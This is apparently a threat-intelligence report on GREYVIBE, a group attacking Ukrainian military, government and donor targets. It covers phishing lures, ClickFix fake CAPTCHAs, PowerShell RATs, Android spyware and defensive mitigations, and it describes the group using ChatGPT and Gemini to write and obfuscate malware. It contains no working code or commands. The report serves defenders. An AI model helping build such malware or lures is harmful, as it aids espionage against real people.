Full Report
A previously undocumented threat actor dubbed GREYVIBE has been attributed to ongoing and persistent attacks targeting Ukraine and Ukraine-related entities since at least August 2025. GREYVIBE, per WithSecure, is assessed to be a Russian-speaking group operating broadly in the Russian time zone, with the activities aligning with Kremlin state interests, specifically when it comes to
Analysis Summary
# Threat Actor: GREYVIBE
## Attribution & Identity
- **Name:** GREYVIBE
- **Origin:** Assessed as a Russian-speaking group operating within Russian time zones.
- **Affiliation:** Activities align with Kremlin state interests. The group contains members believed to be current or former participants in the Russian cybercrime ecosystem.
- **Sophistication:** Characterized as a "low-to-moderately sophisticated group" that relies on AI-assisted tooling to bridge technical gaps but suffers from operational security (OPSEC) blunders.
## Activity Summary
GREYVIBE has been active since at least August 2025, conducting persistent cyber-espionage campaigns primarily aimed at intelligence gathering related to the Russo-Ukrainian war. They are notable for using Generative AI (GenAI) and Large Language Models (LLMs) to develop malware, generate bait images, and refactor code to evade traditional detection.
## Tactics, Techniques & Procedures
- **AI-Augmented Development:** Usage of ChatGPT, Google Gemini, and Ideogram AI for malware development, obfuscation scripts, and social engineering lures.
- **Social Engineering:** Use of spear-phishing, fake CAPTCHA pages (ClickFix style), and fraudulent adult-club or charitable websites.
- **Phishing Lures:** Masquerading as services like Zoom, LAPAS, and charitable foundations supporting the Armed Forces of Ukraine.
- **Execution:** Deployment of JavaScript-based loaders via malicious ZIP/RAR archives hosted on cloud platforms.
- **Persistence:** Implementation of custom watchdog mechanisms in PowerShell scripts.
- **Data Exfiltration:** Exfiltration of browser data, Telegram/WhatsApp communications, and system profiling.
- **AV/Capture:** Use of WebRTC features to capture live audio and video from victims.
## Targeting
- **Sectors:** Military, Government, Civilian, and Business-related organizations.
- **Geography:** Ukraine and Ukraine-related entities.
- **Victims:** Ukrainian military personnel (via fake login screens) and donors supporting the Ukrainian Armed Forces.
## Tools & Infrastructure
- **Malware Families:**
- **PhantomRelay / PhantomRelayV1:** PowerShell-based Remote Access Trojan (RAT).
- **LegionRelay:** Lightweight PowerShell RAT (developed with AI assistance) for file exfiltration and RDP setup.
- **FallSpy:** Android spyware for data harvesting.
- **WireGuard:** Utilized in the "DroneLink" campaign.
- **Infrastructure:**
- **C2/Hosting:** Google Drive, 4sync.
- **Fake Domains:** Bogus sites masquerading as Zoom, LAPAS, and "PrincessClub" adult sites.
- **Defanged Indicators:**
- hxxps[://]thehackernews[.]com/2025/08/clickfix-malware-campaign-exploits[.]html
- Various JS-based loaders and PowerShell scripts.
## Implications
GREYVIBE represents a shift in threat actor evolution where lower-tier actors use AI to "supercharge" their operations. While the group makes significant OPSEC errors and introduces design flaws via AI-generated code, their ability to rapidly refactor and replace operational components makes traditional artifact-based clustering more difficult for defenders. Their alignment with state interests suggests they function as a hybrid entity between cybercrime and state-sponsored espionage.
## Mitigations
- **Script Block & Monitoring:** Implement strict execution policies for PowerShell and monitor for unusual PowerShell activity or obfuscated JavaScript execution.
- **User Training:** Educate users on "ClickFix" tactics where fake CAPTCHAs prompt the execution of terminal commands.
- **Mobile Security:** Deploy Mobile Threat Defense (MTD) to identify and block Android spyware like FallSpy.
- **Cloud Access Control:** Restrict or monitor downloads from public file-sharing services like Google Drive and 4sync in high-risk environments.
- **Infrastructure Blocking:** Defensively sinkhole or block newly registered domains imitating critical collaborative software (Zoom, etc.).